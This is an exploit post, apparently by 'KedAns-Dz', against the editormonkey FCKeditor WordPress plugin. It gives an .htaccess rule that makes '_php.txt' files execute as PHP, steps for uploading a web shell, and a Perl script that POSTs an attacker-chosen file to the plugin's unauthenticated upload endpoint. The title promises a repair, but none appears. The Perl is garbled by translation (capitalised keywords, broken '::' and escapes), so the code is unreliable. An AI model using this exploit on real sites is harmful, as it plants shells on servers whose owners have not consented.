WordPress plugin editormonkey-FCKe Multiple File Upload defects and repair

Title: WordPress Plugins (editormonkey-FCKe) Multiple File Upload Vulnerabilities
Author: KedAns-Dz
Platform: php
Impact: File Upload
Test:

If test. php =>

Creating. htaccess file:

<FilesMatch "_php.txt">
SetHandler application/x-httpd-php
</FilesMatch>

-- And Upload him ^
+ Upload Shrll_php.txt
+ Find him in: http://www.bkjia.com/UserFile/shell.php.txt
 

O0R: ThiS PErl Scr! Pt3:

#! /Usr/bin/perl
System ("title KedAns-Dz ");
System ("color 1e ");
System ("cls ");
Use strict;
Use warnings;
Use LWP: UserAgent;
Use HTTP: Request: Common;
Print <INTRO;
| ================================================ =============|
| = W0rdPrE3S (editormonkey) Arbitrary Shell Upload |
|=> Provided By KedAns-Dz <|
| = E-mail: ked-h [at] hotmail.com |
| ================================================ =============|
INTRO
Print "\ n ";
Print "[!] Enter URL (f. e: http://target.com ):";
Chomp (my $ url = <STDIN> );
Print "\ n ";
Print "[!] Enter File Path (f. e: C: \ Shell.php.gif): "; # File Path For Upload (usage: C: \ Sh3ll.php.gif)
Chomp (my $ file = <STDIN> );
My $ ua = LWP: UserAgent-> new;
My $ re = $ ua-> request (POST $ url. '/wp-content/plugins/editormonkey/fckeditor/editor/filemanager/upload/php/upload. php? Type = FILE ',
Content_Type => 'multipart/form-data ',
Content =>
[
Actions => 'upload ',
NewFile => $ file,
]);
Print "\ n ";
If ($ re-> is_success ){
If (index ($ re-> content, "Disabled ")! =-1) {print "[+] Exploit Successfull! File Uploaded! \ N ";}
Else {print "[-] File Upload Is Disabled! Failed! \ N ";}
} Else {print "[-] HTTP request Failed! \ N ";}
Exit;

_ END _

-----------------------------------------

// SP-thX t0: {Islampard}